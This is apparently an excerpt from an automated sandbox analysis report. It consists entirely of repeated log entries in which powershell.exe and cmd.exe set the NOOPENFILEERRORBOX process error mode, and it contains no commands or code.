                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
